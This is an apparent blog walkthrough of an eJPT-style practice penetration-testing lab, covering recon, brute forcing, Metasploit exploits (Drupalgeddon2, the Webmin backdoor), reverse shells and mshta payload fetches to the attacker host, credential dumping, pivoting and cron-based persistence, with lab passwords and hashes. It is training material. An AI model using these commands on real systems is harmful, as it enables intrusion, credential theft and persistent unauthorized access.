Breaking into Syntex Dynamics

A full penetration test walkthrough against the Syntex Dynamics practice lab - six DMZ hosts, a dual-homed pivot, and an internal network. The structure closely mirrors what you will encounter in the eJPT certification.

The eJPT (eLearnSecurity Junior Penetration Tester) is an entry-level certification by INE Security that tests practical offensive skills in a fully hands-on environment - no multiple choice, no theory. This is a walkthrough of a practice lab that closely replicates the structure and difficulty of the real assessment. The setup mirrors what the eJPT delivers: a Kali machine accessible through a browser-based Apache Guacamole remote desktop, a DMZ with several heterogeneous hosts, and an internal segment reachable only through a pivot. If you are preparing for the certification, the techniques and workflow documented here are directly applicable.

Lab overview

Network Overview

The lab environment consists of two networks:

Network	Range	Description
DMZ	192.168.100.0/24	Directly accessible from Kali
Internal	192.168.0.0/24	Only reachable via pivot

The Kali machine sits at 192.168.100.5. All traffic to the internal network must route through a compromised DMZ host.

Reconnaissance

Host Discovery - DMZ

nmap -sn -n 192.168.100.0/24

IP	MAC
192.168.100.1	02:A5:58:C4:06:F7 (gateway)
192.168.100.50	02:E5:31:05:C6:DD
192.168.100.51	02:85:FB:F6:0D:C3
192.168.100.52	02:59:D1:09:E6:C7
192.168.100.55	02:29:2A:5D:88:9F
192.168.100.63	02:4A:A4:88:C5:57
192.168.100.67	02:FF:18:3B:3E:25

Six targets in the DMZ, excluding the gateway and the Kali machine.

Service Scan - DMZ

nmap -p- --open -sS --min-rate 5000 -n -Pn 192.168.100.50,51,52,55,63,67 -oG dmz_allports
nmap -p<open_ports> -sCV 192.168.100.50,51,52,55,63,67 -oN dmz_targeted

Host	Hostname	OS	Key Ports
192.168.100.50	WINSERVER-01	Windows Server 2012 R2	80 (Apache/WordPress), 445, 3307, 3389, 5985
192.168.100.51	WINSERVER-02	Windows Server 2012 R2	21 (FTP anon), 80 (IIS), 445, 3389, 5985
192.168.100.52	ip-192-168-100-52	Linux/Ubuntu 20.04	21 (FTP anon), 22, 25 (OpenSMTPD), 80 (Drupal), 445, 3306, 3389
192.168.100.55	WINSERVER-03	Windows Server 2019	80, 445, 3389, 5985
192.168.100.63	EC2AMAZ-IK4QFED	Windows Server 2016	3389
192.168.100.67	(none)	Linux/Ubuntu	22

DMZ - WINSERVER-01 (192.168.100.50)

WINSERVER-01 runs a WordPress 5.9.3 site for Syntex Dynamics. The company's office hours (8:00 AM - 6:00 PM) are visible on the landing page - this kind of information gathering detail is typical of the questions you will face in the real assessment.

WordPress Enumeration

Running wpscan with the full enumeration set confirms the WordPress version but does not return any plugins - likely due to the missing API token, which is required for vulnerability lookups and improves detection coverage:

wpscan --url http://192.168.100.50/wordpress/ -e u,vp,ap,tt,t,cb,dbe

WordPress version: 5.9.3

Credential Discovery

Credentials are obtained by brute-forcing the XML-RPC endpoint, which avoids the lockout controls on wp-login.php:

wpscan --url http://192.168.100.50/wordpress/ \
  --usernames admin \
  --passwords /usr/share/wordlists/rockyou.txt \
  --password-attack xmlrpc

Gotcha

WordPress has siteurl set to wordpress.local. After logging in, the browser redirects to that hostname and returns a 404. Fix: add the entry to /etc/hosts.

echo "192.168.100.50 wordpress.local" >> /etc/hosts

Credentials: admin:estrella

Plugin Enumeration - wp-admin

Once logged in, the plugin list is visible directly from wp-admin -> Plugins:

Plugin	Version
WP File Manager	7.1.4
Burger Companion	4.8
WordPress Responsive Thumbnail Slider	1.0

The most interesting one is WP File Manager 7.1.4, which provides a full filesystem browser inside wp-admin and allows uploading arbitrary files.

echo "192.168.100.50 wordpress.local" >> /etc/hosts

Credentials: admin:estrella

Exploitation - WP File Manager RCE

From wp-admin -> WP File Manager, we upload a PHP reverse shell:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.100.5 LPORT=4444 -f raw > shell.php

After uploading and triggering it via the browser, we get a Meterpreter session already running as SYSTEM:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post-Exploitation

load kiwi
lsa_dump_sam
lsa_dump_secrets

lsa_dump_sam - WINSERVER-01

Domain : WINSERVER-01
SysKey : 37cbff09ae8a6e2a3db546e135ca4650
 
RID  : 000001f4 (500)  User : Administrator  Hash NTLM: 5c4d59391f656d5958dab124ffeabc20
RID  : 000001f5 (501)  User : Guest
RID  : 000003f1 (1009) User : mike             Hash NTLM: c7bad7d1cc2f3c69adea5ccb429234ad
RID  : 000003f2 (1010) User : vince            Hash NTLM: c9b30a86acaea990bf9fa6c35ac9dd92
RID  : 000003f3 (1011) User : admin            Hash NTLM: 72f5cfa80f07819ccbcfb72feb9eb9b7

lsa_dump_secrets reveals the DefaultPassword stored in LSA secrets:

Administrator : ROOT#123

Interesting detail

WINSERVER-01 and WINSERVER-02 share the exact same SysKey and SAMKey and the Administrator NTLM hash is identical on both machines. They were provisioned from the same cloned image.

DMZ - WINSERVER-02 (192.168.100.51)

WINSERVER-02 runs IIS 8.5. Anonymous FTP access leads directly to the webroot.

FTP Anonymous Access

ftp 192.168.100.51
# anonymous login - list files

The webroot contains a pre-deployed cmdasp.aspx - a classic ASPX command execution webshell. It is already active and running as NT AUTHORITY\SYSTEM.

Exploitation - ASPX Webshell + HTA Server

With OS command execution available via the webshell, we use the exploit/windows/misc/hta_server Metasploit module. This serves an HTA file that, when fetched by the target, executes our payload:

msf > use exploit/windows/misc/hta_server
msf exploit(...) > set LHOST 192.168.100.5
msf exploit(...) > set LPORT 4446
msf exploit(...) > run

Then from the cmdasp.aspx webshell we issue:

mshta http://192.168.100.5:8080/<random>.hta

This returns a Meterpreter x64 session as NT AUTHORITY\SYSTEM. The same lsa_dump_sam / lsa_dump_secrets workflow recovers credentials:

User	Hash NTLM
Administrator	5c4d59391f656d5958dab124ffeabc20
steven	8ae09f001f2b3cc4f4ff6346fc9545c4

Password from LSA secrets: Administrator:ROOT#123

DMZ - Linux (192.168.100.52)

This Ubuntu 20.04 box runs three interesting services: Drupal 7.57, OpenSMTPD, and MariaDB.

Drupal Enumeration

curl http://192.168.100.52/CHANGELOG.txt | head -3
# Drupal 7.57

The Drupal database reveals four user accounts. We access them via MySQL using credentials found in settings.php:

mysql -u drupal -psyntex0421 -e "SELECT name, mail, pass FROM drupal.users;"

name	mail	pass
admin	[email protected]	$S$D4MHMKKb8BovU8F45e9rFCCqbXMDmRnCYSUp0
auditor		$S$DpQJYqBLxWQJiJSvpHBIEkRb0D7kS3vGMx6z.
dbadmin		$S$DwXfLGRqMzUG9mCjEtfR6VKClU6ILFRCnV8eY
Vincenzo		$S$DVmI7gBXVE4H6CVD7u7n0BbLH5.xPcQ2u3OGZ

Hashes are cracked with hashcat using Drupal7 mode (7900):

hashcat -m 7900 drupal_hashes.txt /usr/share/wordlists/rockyou.txt

User	Password
auditor	qwertyuiop
dbadmin	sayang
Vincenzo	789456

Exploitation - Drupalgeddon2

Drupal 7.57 is vulnerable to CVE-2018-7600 (Drupalgeddon2):

msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(...) > set RHOSTS 192.168.100.52
msf exploit(...) > run

We land as www-data. We switch to auditor using the cracked password:

su auditor  # password: qwertyuiop

Checking sudo -l shows:

(root) NOPASSWD: /usr/bin/find

A classic GTFOBins escalation gets us a root shell immediately:

sudo find . -exec /bin/bash \; -quit

root@ip-192-168-100-52:/var/www/html# whoami
root

SSH Brute Force

The same OS users authenticate via SSH with the same passwords:

hydra -L users.txt -P drupal_passwords.txt ssh://192.168.100.52

[22][ssh] host: 192.168.100.52  login: auditor   password: qwertyuiop
[22][ssh] host: 192.168.100.52  login: dbadmin   password: sayang

OpenSMTPD - CVE-2020-7247

The SMTP service is OpenSMTPD, vulnerable to CVE-2020-7247 - a remote code execution flaw in the MAIL FROM handler that requires no authentication.

SMB User Enumeration

enum4linux -r -u "" -p "" 192.168.100.52

RID cycling reveals three OS accounts: ubuntu, auditor, dbadmin.

DMZ - WINSERVER-03 (192.168.100.55)

WINSERVER-03 is the most important host in the DMZ. It is dual-homed, bridging the DMZ (192.168.100.55) and the internal network (192.168.0.50). Compromising it is the gateway to the second phase of the engagement.

Exploitation - WinRM Brute Force

msf > use auxiliary/scanner/winrm/winrm_login
msf auxiliary(...) > set RHOSTS 192.168.100.55
msf auxiliary(...) > set USERNAME administrator
msf auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf auxiliary(...) > run

[+] 192.168.100.55:5985 - Login Successful: WORKSTATION\administrator:swordfish

When winrm_login finds valid credentials it opens an interactive shell session directly. We interact with it via:

msf auxiliary(...) > sessions -i <session_id>

We confirm the dual-homed status with ipconfig /all:

Ethernet DMZ:       192.168.100.55
Ethernet Internal:  192.168.0.50

Post-Exploitation

load kiwi
lsa_dump_sam
lsa_dump_secrets

User	Hash NTLM	Password
Administrator	61fb34469b9989b01be4e8630c52eed6	swordfish
student	(not cracked)	-
mary	(cracked with hashcat)	hotmama
lawrence	(cracked with hashcat)	computadora

Pivot - Internal Network (192.168.0.0/24)

With a Meterpreter session on WINSERVER-03, we set up a layer-3 route to the internal network:

meterpreter > run autoroute -s 192.168.0.0/24
meterpreter > background

msf > use auxiliary/server/socks_proxy
msf auxiliary(...) > set SRVPORT 9050
msf auxiliary(...) > set VERSION 4a
msf auxiliary(...) > run

This allows using proxychains for external tools (nmap, crackmapexec, evil-winrm).

Host Discovery - Internal Network

Direct ICMP through a Meterpreter route cannot be sent with a plain ping command from Kali. We use the post-exploitation sweep module instead:

msf > use post/multi/gather/ping_sweep
msf post(...) > set RHOSTS 192.168.0.1-254
msf post(...) > set SESSION <session_id>
msf post(...) > run

[+] 192.168.0.1  alive
[+] 192.168.0.50 alive  (WINSERVER-03 internal interface)
[+] 192.168.0.51 alive
[+] 192.168.0.57 alive

A follow-up TCP port scan with the MSF scanner finds a fourth host that blocks ICMP:

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(...) > set RHOSTS 192.168.0.1-254
msf auxiliary(...) > set PORTS 22,80,135,139,443,445,3306,3389,5985,8080,10000
msf auxiliary(...) > set THREADS 10
msf auxiliary(...) > run

[+] 192.168.0.61 - 192.168.0.61:3389 - TCP OPEN
[+] 192.168.0.61 - 192.168.0.61:5985 - TCP OPEN

Important

arp_sweep does not work through an autoroute as it operates at layer 2 and cannot traverse a routed tunnel. ping_sweep (layer-3 ICMP) works correctly.

Internal Network Map

IP	Hostname	OS	Key Services
192.168.0.51	(none)	Linux/Ubuntu	22 (SSH), 80 (Apache), 3389 (xRDP), 10000 (Webmin)
192.168.0.57	(none)	Linux/Ubuntu	22 (SSH only)
192.168.0.61	EC2AMAZ-IK4QFED	Windows Server 2016	3389, 5985 (WinRM)

192.168.0.61 shares the hostname EC2AMAZ-IK4QFED with 192.168.100.63 in the DMZ, confirming it is the same dual-homed host.

Internal - Linux (192.168.0.51)

This Ubuntu host runs Webmin 1.920 on port 10000.

Exploitation - CVE-2019-15107 (Webmin Backdoor)

Webmin 1.920 contains an intentionally backdoored build (CVE-2019-15107). The password reset endpoint executes arbitrary OS commands as root with no authentication required.

msf > use exploit/linux/http/webmin_backdoor
msf exploit(...) > set RHOSTS 192.168.0.51
msf exploit(...) > set RPORT 10000
msf exploit(...) > set SSL false

⚠️ Use a bind payload

The internal host cannot reach Kali's DMZ IP (192.168.100.5) directly. Any reverse TCP payload will time out with no session created. Metasploit must connect to the target through the routed tunnel instead.

msf exploit(...) > set payload cmd/unix/bind_perl
msf exploit(...) > set LHOST 192.168.0.51
msf exploit(...) > run

[*] Command shell session opened
# whoami
root

Persistence via Reverse Port Forward

To maintain access across session restarts, we set up a reverse port forward through the WINSERVER-03 pivot:

# On the WINSERVER-03 meterpreter session:
portfwd add -R -l 10777 -p 10777 -L 192.168.100.5

This tunnels connections through: 192.168.0.51:10777 -> 192.168.0.50:10777 -> 192.168.100.5:10777. A cron job on the Linux host then maintains a reverse shell through this tunnel.

Key Challenges

winrm_login False Positives Through Pivot

The winrm_login module crashes with a NoMethodError when it finds a valid login through a SOCKS proxy. The crash causes it to report the last password tested at the time of the crash as valid, regardless of whether it actually worked. Running the module three times produced three different "valid" passwords: abc123, 12345, nicole.

Fix: verify every result with crackmapexec before trusting it:

proxychains crackmapexec winrm 192.168.0.61 -u administrator -p abc123

Bind vs. Reverse Payloads Through a Pivot

Internal hosts on 192.168.0.0/24 cannot initiate connections back to Kali at 192.168.100.5. Any reverse-TCP payload will simply time out.

Fix: switch to bind payloads (cmd/unix/bind_perl, windows/x64/meterpreter/bind_tcp). Metasploit connects to the target through the routed tunnel rather than waiting for a callback.

Credentials Summary

User	Password	Service	Source
admin	estrella	WordPress	XML-RPC brute force
Administrator	ROOT#123	Windows (WINSERVER-01, 02)	LSA DefaultPassword
auditor	qwertyuiop	Drupal / SSH / OS	Drupal hash cracking
dbadmin	sayang	Drupal / SSH	Drupal hash cracking
Vincenzo	789456	Drupal	Drupal hash cracking
drupal	syntex0421	MariaDB	settings.php
administrator	swordfish	WinRM / SMB (WINSERVER-03)	WinRM brute force
mary	hotmama	Windows	NTLM hash cracking
lawrence	computadora	Windows	NTLM hash cracking